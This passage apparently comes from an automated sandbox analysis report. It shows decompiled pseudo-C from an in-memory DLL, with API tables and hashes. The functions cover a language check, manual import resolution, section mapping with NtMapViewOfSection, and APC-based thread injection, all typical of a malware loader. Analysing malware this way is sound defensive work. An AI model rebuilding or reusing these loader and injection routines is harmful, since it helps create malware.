                                    					__imp__GetSystemDefaultUILanguage();
                                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                    				}
                                    				return _v8;
                                    			}





                                    0x6e1d156a
                                    0x6e1d157b
                                    0x6e1d1583
                                    0x6e1d1585
                                    0x6e1d1598
                                    0x6e1d1598
                                    0x6e1d15a2

                                    APIs
                                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E1D1C5E,?,6E1D1810,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D157B
                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E1D1C5E,?,6E1D1810,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1585
                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1D1C5E,?,6E1D1810,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1598
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                    • String ID:
                                    • API String ID: 3724080410-0
                                    • Opcode ID: 3cafc63059d06974bc7c5c2ca5d4230aa3e6a946d1aa74df4670c63534b31289
                                    • Instruction ID: 26a0dd8112757d9cc1a30b4fa58ea19632228832e168d91e260d72c96d3ea99a
                                    • Opcode Fuzzy Hash: 3cafc63059d06974bc7c5c2ca5d4230aa3e6a946d1aa74df4670c63534b31289
                                    • Instruction Fuzzy Hash: B0E04FB8740208F6EB00E7E19C0AFBE72BCAB0170AF500084FB01E60C0D6B49A09F725
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D1F31(void* __edi, intOrPtr _a4) {
                                    				signed int _v8;
                                    				intOrPtr* _v12;
                                    				_Unknown_base(*)()** _v16;
                                    				signed int _v20;
                                    				signed short _v24;
                                    				struct HINSTANCE__* _v28;
                                    				intOrPtr _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr _t46;
                                    				struct HINSTANCE__* _t47;
                                    				intOrPtr* _t49;
                                    				intOrPtr _t50;
                                    				signed short _t51;
                                    				_Unknown_base(*)()* _t53;
                                    				CHAR* _t54;
                                    				_Unknown_base(*)()* _t55;
                                    				void* _t58;
                                    				signed int _t59;
                                    				_Unknown_base(*)()* _t60;
                                    				intOrPtr _t61;
                                    				intOrPtr _t65;
                                    				signed int _t68;
                                    				void* _t69;
                                    				CHAR* _t71;
                                    				signed short* _t73;
                                    
                                    				_t69 = __edi;
                                    				_v20 = _v20 & 0x00000000;
                                    				_t59 =  *0x6e1d41cc;
                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                    				if(_t43 != 0) {
                                    					_t45 = _t43 + __edi;
                                    					_v12 = _t45;
                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                    					if(_t46 != 0) {
                                    						while(1) {
                                    							_t71 = _t46 + _t69;
                                    							_t47 = LoadLibraryA(_t71); // executed
                                    							_v28 = _t47;
                                    							if(_t47 == 0) {
                                    								break;
                                    							}
                                    							_v24 = _v24 & 0x00000000;
                                    							 *_t71 = _t59 - 0x63699bc3;
                                    							_t49 = _v12;
                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                    							_t50 =  *_t49;
                                    							if(_t50 != 0) {
                                    								L6:
                                    								_t73 = _t50 + _t69;
                                    								_v16 = _t61 + _t69;
                                    								while(1) {
                                    									_t51 =  *_t73;
                                    									if(_t51 == 0) {
                                    										break;
                                    									}
                                    									if(__eflags < 0) {
                                    										__eflags = _t51 - _t69;
                                    										if(_t51 < _t69) {
                                    											L12:
                                    											_t21 =  &_v8;
                                    											 *_t21 = _v8 & 0x00000000;
                                    											__eflags =  *_t21;
                                    											_v24 =  *_t73 & 0x0000ffff;
                                    										} else {
                                    											_t65 = _a4;
                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                    												goto L12;
                                    											} else {
                                    												goto L11;
                                    											}
                                    										}
                                    									} else {
                                    										_t51 = _t51 + _t69;
                                    										L11:
                                    										_v8 = _t51;
                                    									}
                                    									_t53 = _v8;
                                    									__eflags = _t53;
                                    									if(_t53 == 0) {
                                    										_t54 = _v24 & 0x0000ffff;
                                    									} else {
                                    										_t54 = _t53 + 2;
                                    									}
                                    									_t55 = GetProcAddress(_v28, _t54);
                                    									__eflags = _t55;
                                    									if(__eflags == 0) {
                                    										_v20 = _t59 - 0x63699b44;
                                    									} else {
                                    										_t68 = _v8;
                                    										__eflags = _t68;
                                    										if(_t68 != 0) {
                                    											 *_t68 = _t59 - 0x63699bc3;
                                    										}
                                    										 *_v16 = _t55;
                                    										_t58 = 0x725990f8 + _t59 * 4;
                                    										_t73 = _t73 + _t58;
                                    										_t32 =  &_v16;
                                    										 *_t32 = _v16 + _t58;
                                    										__eflags =  *_t32;
                                    										continue;
                                    									}
                                    									goto L23;
                                    								}
                                    							} else {
                                    								_t50 = _t61;
                                    								if(_t61 != 0) {
                                    									goto L6;
                                    								}
                                    							}
                                    							L23:
                                    							_v12 = _v12 + 0x14;
                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                    							if(_t46 != 0) {
                                    								continue;
                                    							} else {
                                    							}
                                    							L26:
                                    							goto L27;
                                    						}
                                    						_t60 = _t59 + 0x9c9664bb;
                                    						__eflags = _t60;
                                    						_v20 = _t60;
                                    						goto L26;
                                    					}
                                    				}
                                    				L27:
                                    				return _v20;
                                    			}




























                                    0x6e1d1f31
                                    0x6e1d1f3a
                                    0x6e1d1f3f
                                    0x6e1d1f45
                                    0x6e1d1f4e
                                    0x6e1d1f54
                                    0x6e1d1f56
                                    0x6e1d1f59
                                    0x6e1d1f5e
                                    0x6e1d1f65
                                    0x6e1d1f65
                                    0x6e1d1f69
                                    0x6e1d1f71
                                    0x6e1d1f74
                                    0x00000000
                                    0x00000000
                                    0x6e1d1f7a
                                    0x6e1d1f84
                                    0x6e1d1f86
                                    0x6e1d1f89
                                    0x6e1d1f8c
                                    0x6e1d1f90
                                    0x6e1d1f98
                                    0x6e1d1f9a
                                    0x6e1d1f9d
                                    0x6e1d2005
                                    0x6e1d2005
                                    0x6e1d2009
                                    0x00000000
                                    0x00000000
                                    0x6e1d1fa2
                                    0x6e1d1fa8
                                    0x6e1d1faa
                                    0x6e1d1fbd
                                    0x6e1d1fc0
                                    0x6e1d1fc0
                                    0x6e1d1fc0
                                    0x6e1d1fc4
                                    0x6e1d1fac
                                    0x6e1d1fac
                                    0x6e1d1fb4
                                    0x6e1d1fb6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d1fb6
                                    0x6e1d1fa4
                                    0x6e1d1fa4
                                    0x6e1d1fb8
                                    0x6e1d1fb8
                                    0x6e1d1fb8
                                    0x6e1d1fc7
                                    0x6e1d1fca
                                    0x6e1d1fcc
                                    0x6e1d1fd3
                                    0x6e1d1fce
                                    0x6e1d1fce
                                    0x6e1d1fce
                                    0x6e1d1fdb
                                    0x6e1d1fe1
                                    0x6e1d1fe3
                                    0x6e1d2013
                                    0x6e1d1fe5
                                    0x6e1d1fe5
                                    0x6e1d1fe8
                                    0x6e1d1fea
                                    0x6e1d1ff2
                                    0x6e1d1ff2
                                    0x6e1d1ff7
                                    0x6e1d1ff9
                                    0x6e1d2000
                                    0x6e1d2002
                                    0x6e1d2002
                                    0x6e1d2002
                                    0x00000000
                                    0x6e1d2002
                                    0x00000000
                                    0x6e1d1fe3
                                    0x6e1d1f92
                                    0x6e1d1f94
                                    0x6e1d1f96
                                    0x00000000
                                    0x00000000
                                    0x6e1d1f96
                                    0x6e1d2016
                                    0x6e1d2016
                                    0x6e1d201d
                                    0x6e1d2022
                                    0x00000000
                                    0x00000000
                                    0x6e1d2028
                                    0x6e1d2033
                                    0x00000000
                                    0x6e1d2033
                                    0x6e1d202a
                                    0x6e1d202a
                                    0x6e1d2030
                                    0x00000000
                                    0x6e1d2030
                                    0x6e1d1f5e
                                    0x6e1d2034
                                    0x6e1d2039

                                    APIs
                                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1D1F69
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 6E1D1FDB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 2574300362-0
                                    • Opcode ID: 9f22bfceb82b4bdacbc68b3f4695d51a21f91b132a0dd923a2e6226ef957e49a
                                    • Instruction ID: cfbd2e21c5bd8a7eb2e05704568bd01281c1556f0f7bfc6d33ed91f62ca508de
                                    • Opcode Fuzzy Hash: 9f22bfceb82b4bdacbc68b3f4695d51a21f91b132a0dd923a2e6226ef957e49a
                                    • Instruction Fuzzy Hash: 7D313771B0020ADFEB44CF99C880AAEB7F4BF55344B214169E821E7240E774DA8DEB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E6E1D1B89(void** __esi, PVOID* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				long _t13;
                                    
                                    				_v16 = 0;
                                    				asm("stosd");
                                    				_v8 = 0;
                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                    				if(_t13 < 0) {
                                    					_push(_t13);
                                    					return __esi[6]();
                                    				}
                                    				return 0;
                                    			}







                                    0x6e1d1b9b
                                    0x6e1d1ba1
                                    0x6e1d1baf
                                    0x6e1d1bb6
                                    0x6e1d1bbb
                                    0x6e1d1bc1
                                    0x00000000
                                    0x6e1d1bc2
                                    0x00000000

                                    APIs
                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,6E1D1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1D1943,?), ref: 6E1D1BB6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: SectionView
                                    • String ID:
                                    • API String ID: 1323581903-0
                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction ID: 1b2b0704b15c104837406b01a7b0ed3a7b5661fa45e56375d4ffdd5a994dc63a
                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction Fuzzy Hash: 69F0FEB5A00208BFEB119EA5CC85C9BBBBDEB44254B104929F552A2090E6309E4C9A60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E6E1D1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                    				intOrPtr _v12;
                                    				struct _FILETIME* _v16;
                                    				short _v60;
                                    				struct _FILETIME* _t14;
                                    				intOrPtr _t15;
                                    				long _t18;
                                    				void* _t19;
                                    				void* _t22;
                                    				intOrPtr _t31;
                                    				long _t32;
                                    				void* _t34;
                                    
                                    				_t31 = __edx;
                                    				_t14 =  &_v16;
                                    				GetSystemTimeAsFileTime(_t14);
                                    				_push(0x192);
                                    				_push(0x54d38000);
                                    				_push(_v12);
                                    				_push(_v16);
                                    				L6E1D2210();
                                    				_push(_t14);
                                    				_v16 = _t14;
                                    				_t15 =  *0x6e1d41d0;
                                    				_push(_t15 + 0x6e1d505e);
                                    				_push(_t15 + 0x6e1d5054);
                                    				_push(0x16);
                                    				_push( &_v60);
                                    				_v12 = _t31;
                                    				L6E1D220A();
                                    				_t18 = _a4;
                                    				if(_t18 == 0) {
                                    					_t18 = 0x1000;
                                    				}
                                    				_t19 = CreateFileMappingW(0xffffffff, 0x6e1d41c0, 4, 0, _t18,  &_v60); // executed
                                    				_t34 = _t19;
                                    				if(_t34 == 0) {
                                    					_t32 = GetLastError();
                                    				} else {
                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                    						if(_t22 == 0) {
                                    							_t32 = GetLastError();
                                    							if(_t32 != 0) {
                                    								goto L9;
                                    							}
                                    						} else {
                                    							 *_a8 = _t34;
                                    							 *_a12 = _t22;
                                    							_t32 = 0;
                                    						}
                                    					} else {
                                    						_t32 = 2;
                                    						L9:
                                    						CloseHandle(_t34);
                                    					}
                                    				}
                                    				return _t32;
                                    			}














                                    0x6e1d1979
                                    0x6e1d1982
                                    0x6e1d1986
                                    0x6e1d198c
                                    0x6e1d1991
                                    0x6e1d1996
                                    0x6e1d1999
                                    0x6e1d199c
                                    0x6e1d19a1
                                    0x6e1d19a2
                                    0x6e1d19a5
                                    0x6e1d19b0
                                    0x6e1d19b7
                                    0x6e1d19bb
                                    0x6e1d19bd
                                    0x6e1d19be
                                    0x6e1d19c1
                                    0x6e1d19c6
                                    0x6e1d19d0
                                    0x6e1d19d2
                                    0x6e1d19d2
                                    0x6e1d19e6
                                    0x6e1d19ec
                                    0x6e1d19f0
                                    0x6e1d1a40
                                    0x6e1d19f2
                                    0x6e1d19fb
                                    0x6e1d1a11
                                    0x6e1d1a19
                                    0x6e1d1a2b
                                    0x6e1d1a2f
                                    0x00000000
                                    0x00000000
                                    0x6e1d1a1b
                                    0x6e1d1a1e
                                    0x6e1d1a23
                                    0x6e1d1a25
                                    0x6e1d1a25
                                    0x6e1d1a06
                                    0x6e1d1a08
                                    0x6e1d1a31
                                    0x6e1d1a32
                                    0x6e1d1a32
                                    0x6e1d19fb
                                    0x6e1d1a48

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?,?), ref: 6E1D1986
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1D199C
                                    • _snwprintf.NTDLL ref: 6E1D19C1
                                    • CreateFileMappingW.KERNELBASE(000000FF,6E1D41C0,00000004,00000000,?,?), ref: 6E1D19E6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D19FD
                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1D1A11
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D1A29
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A), ref: 6E1D1A32
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D1A3A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1724014008-0
                                    • Opcode ID: fb8d8848de815a7267ba500a44b5efb43bc6c14f6be3e4d667a183ac02b36403
                                    • Instruction ID: 4e63b4ae8bb16e40770931ba6e81826a07430c7c649393e89cea205692b91b0a
                                    • Opcode Fuzzy Hash: fb8d8848de815a7267ba500a44b5efb43bc6c14f6be3e4d667a183ac02b36403
                                    • Instruction Fuzzy Hash: D021D3B2600148BFDB00AFD8DC88EDE77BCEB45354F218025F615E7180D6705889EB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                    				intOrPtr _v8;
                                    				_Unknown_base(*)()* _t29;
                                    				_Unknown_base(*)()* _t33;
                                    				_Unknown_base(*)()* _t36;
                                    				_Unknown_base(*)()* _t39;
                                    				_Unknown_base(*)()* _t42;
                                    				intOrPtr _t46;
                                    				struct HINSTANCE__* _t50;
                                    				intOrPtr _t56;
                                    
                                    				_t56 = E6E1D1C8F(0x20);
                                    				if(_t56 == 0) {
                                    					_v8 = 8;
                                    				} else {
                                    					_t50 = GetModuleHandleA( *0x6e1d41d0 + 0x6e1d5014);
                                    					_v8 = 0x7f;
                                    					_t29 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50e1);
                                    					 *(_t56 + 0xc) = _t29;
                                    					if(_t29 == 0) {
                                    						L8:
                                    						E6E1D136A(_t56);
                                    					} else {
                                    						_t33 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50f1);
                                    						 *(_t56 + 0x10) = _t33;
                                    						if(_t33 == 0) {
                                    							goto L8;
                                    						} else {
                                    							_t36 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5104);
                                    							 *(_t56 + 0x14) = _t36;
                                    							if(_t36 == 0) {
                                    								goto L8;
                                    							} else {
                                    								_t39 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5119);
                                    								 *(_t56 + 0x18) = _t39;
                                    								if(_t39 == 0) {
                                    									goto L8;
                                    								} else {
                                    									_t42 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d512f);
                                    									 *(_t56 + 0x1c) = _t42;
                                    									if(_t42 == 0) {
                                    										goto L8;
                                    									} else {
                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                    										_t46 = E6E1D18D1(_t56, _a12); // executed
                                    										_v8 = _t46;
                                    										if(_t46 != 0) {
                                    											goto L8;
                                    										} else {
                                    											 *_a16 = _t56;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}












                                    0x6e1d1ab3
                                    0x6e1d1ab7
                                    0x6e1d1b78
                                    0x6e1d1abd
                                    0x6e1d1ad5
                                    0x6e1d1ae4
                                    0x6e1d1aeb
                                    0x6e1d1aef
                                    0x6e1d1af2
                                    0x6e1d1b70
                                    0x6e1d1b71
                                    0x6e1d1af4
                                    0x6e1d1b01
                                    0x6e1d1b05
                                    0x6e1d1b08
                                    0x00000000
                                    0x6e1d1b0a
                                    0x6e1d1b17
                                    0x6e1d1b1b
                                    0x6e1d1b1e
                                    0x00000000
                                    0x6e1d1b20
                                    0x6e1d1b2d
                                    0x6e1d1b31
                                    0x6e1d1b34
                                    0x00000000
                                    0x6e1d1b36
                                    0x6e1d1b43
                                    0x6e1d1b47
                                    0x6e1d1b4a
                                    0x00000000
                                    0x6e1d1b4c
                                    0x6e1d1b52
                                    0x6e1d1b58
                                    0x6e1d1b5d
                                    0x6e1d1b64
                                    0x6e1d1b67
                                    0x00000000
                                    0x6e1d1b69
                                    0x6e1d1b6c
                                    0x6e1d1b6c
                                    0x6e1d1b67
                                    0x6e1d1b4a
                                    0x6e1d1b34
                                    0x6e1d1b1e
                                    0x6e1d1b08
                                    0x6e1d1af2
                                    0x6e1d1b86

                                    APIs
                                      • Part of subcall function 6E1D1C8F: HeapAlloc.KERNEL32(00000000,?,6E1D117D,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1C9B
                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1D1272,?,?,?,?), ref: 6E1D1AC9
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1AEB
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B01
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B17
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B2D
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B43
                                      • Part of subcall function 6E1D18D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E1D192E
                                      • Part of subcall function 6E1D18D1: memset.NTDLL ref: 6E1D1950
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                    • String ID:
                                    • API String ID: 1632424568-0
                                    • Opcode ID: f284ad02a2944e0a1d5907a02e65cfecae697a1471b10e89578309478a033115
                                    • Instruction ID: 457e5bfffa5ffeec816dbe5d657a70d252851e625ac9e60ce254a52370896398
                                    • Opcode Fuzzy Hash: f284ad02a2944e0a1d5907a02e65cfecae697a1471b10e89578309478a033115
                                    • Instruction Fuzzy Hash: C3216DB160170BDFDB40EFA9C880E5A7BFCFB55284B114525E885D7251E730E949EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                    				long _v8;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				char _t9;
                                    				void* _t10;
                                    				void* _t18;
                                    				void* _t23;
                                    				void* _t36;
                                    
                                    				_push(__ecx);
                                    				_t9 = _a8;
                                    				_v8 = 1;
                                    				if(_t9 == 0) {
                                    					_t10 = InterlockedDecrement(0x6e1d4188);
                                    					__eflags = _t10;
                                    					if(_t10 == 0) {
                                    						__eflags =  *0x6e1d418c;
                                    						if( *0x6e1d418c != 0) {
                                    							_t36 = 0x2328;
                                    							while(1) {
                                    								SleepEx(0x64, 1);
                                    								__eflags =  *0x6e1d4198;
                                    								if( *0x6e1d4198 == 0) {
                                    									break;
                                    								}
                                    								_t36 = _t36 - 0x64;
                                    								__eflags = _t36;
                                    								if(_t36 > 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							CloseHandle( *0x6e1d418c);
                                    						}
                                    						HeapDestroy( *0x6e1d4190);
                                    					}
                                    				} else {
                                    					if(_t9 == 1 && InterlockedIncrement(0x6e1d4188) == 1) {
                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                    						_t41 = _t18;
                                    						 *0x6e1d4190 = _t18;
                                    						if(_t18 == 0) {
                                    							L6:
                                    							_v8 = 0;
                                    						} else {
                                    							 *0x6e1d41b0 = _a4;
                                    							asm("lock xadd [eax], edi");
                                    							_push( &_a8);
                                    							_t23 = E6E1D1CA4(E6E1D1D32, E6E1D1EE0(_a12, 1, 0x6e1d4198, _t41));
                                    							 *0x6e1d418c = _t23;
                                    							if(_t23 == 0) {
                                    								asm("lock xadd [esi], eax");
                                    								goto L6;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}












                                    0x6e1d1e07
                                    0x6e1d1e13
                                    0x6e1d1e15
                                    0x6e1d1e18
                                    0x6e1d1e8e
                                    0x6e1d1e94
                                    0x6e1d1e96
                                    0x6e1d1e98
                                    0x6e1d1e9e
                                    0x6e1d1ea0
                                    0x6e1d1ea5
                                    0x6e1d1ea8
                                    0x6e1d1eb3
                                    0x6e1d1eb5
                                    0x00000000
                                    0x00000000
                                    0x6e1d1eb7
                                    0x6e1d1eba
                                    0x6e1d1ebc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d1ebc
                                    0x6e1d1ec4
                                    0x6e1d1ec4
                                    0x6e1d1ed0
                                    0x6e1d1ed0
                                    0x6e1d1e1a
                                    0x6e1d1e1b
                                    0x6e1d1e3b
                                    0x6e1d1e41
                                    0x6e1d1e43
                                    0x6e1d1e48
                                    0x6e1d1e84
                                    0x6e1d1e84
                                    0x6e1d1e4a
                                    0x6e1d1e52
                                    0x6e1d1e59
                                    0x6e1d1e63
                                    0x6e1d1e6f
                                    0x6e1d1e76
                                    0x6e1d1e7b
                                    0x6e1d1e80
                                    0x00000000
                                    0x6e1d1e80
                                    0x6e1d1e7b
                                    0x6e1d1e48
                                    0x6e1d1e1b
                                    0x6e1d1edd

                                    APIs
                                    • InterlockedIncrement.KERNEL32(6E1D4188), ref: 6E1D1E26
                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1D1E3B
                                      • Part of subcall function 6E1D1CA4: CreateThread.KERNELBASE ref: 6E1D1CBB
                                      • Part of subcall function 6E1D1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D1CD0
                                      • Part of subcall function 6E1D1CA4: GetLastError.KERNEL32(00000000), ref: 6E1D1CDB
                                      • Part of subcall function 6E1D1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1CE5
                                      • Part of subcall function 6E1D1CA4: CloseHandle.KERNEL32(00000000), ref: 6E1D1CEC
                                      • Part of subcall function 6E1D1CA4: SetLastError.KERNEL32(00000000), ref: 6E1D1CF5
                                    • InterlockedDecrement.KERNEL32(6E1D4188), ref: 6E1D1E8E
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E1D1EA8
                                    • CloseHandle.KERNEL32 ref: 6E1D1EC4
                                    • HeapDestroy.KERNEL32 ref: 6E1D1ED0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                    • String ID:
                                    • API String ID: 2110400756-0
                                    • Opcode ID: 2b2c1110b43f65c27fe819df1ce12a688aee7d2006a8c06894a5467fd1e42831
                                    • Instruction ID: 368bcd1058eac8a494b88ba8947e99def6055484096c9fefdd2573d8e68d6ccb
                                    • Opcode Fuzzy Hash: 2b2c1110b43f65c27fe819df1ce12a688aee7d2006a8c06894a5467fd1e42831
                                    • Instruction Fuzzy Hash: 53219035B01609FFDB418FEECC88A4A7BACFB663607608529E515D3140E734998EBB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D1CA4(long _a4, DWORD* _a12) {
                                    				_Unknown_base(*)()* _v0;
                                    				void* _t4;
                                    				long _t6;
                                    				long _t11;
                                    				void* _t13;
                                    
                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1d41cc, 0, _a12); // executed
                                    				_t13 = _t4;
                                    				if(_t13 != 0) {
                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                    					if(_t6 == 0) {
                                    						_t11 = GetLastError();
                                    						TerminateThread(_t13, _t11);
                                    						CloseHandle(_t13);
                                    						_t13 = 0;
                                    						SetLastError(_t11);
                                    					}
                                    				}
                                    				return _t13;
                                    			}








                                    0x6e1d1cbb
                                    0x6e1d1cc1
                                    0x6e1d1cc5
                                    0x6e1d1cd0
                                    0x6e1d1cd8
                                    0x6e1d1ce1
                                    0x6e1d1ce5
                                    0x6e1d1cec
                                    0x6e1d1cf3
                                    0x6e1d1cf5
                                    0x6e1d1cfb
                                    0x6e1d1cd8
                                    0x6e1d1cff

                                    APIs
                                    • CreateThread.KERNELBASE ref: 6E1D1CBB
                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D1CD0
                                    • GetLastError.KERNEL32(00000000), ref: 6E1D1CDB
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1CE5
                                    • CloseHandle.KERNEL32(00000000), ref: 6E1D1CEC
                                    • SetLastError.KERNEL32(00000000), ref: 6E1D1CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
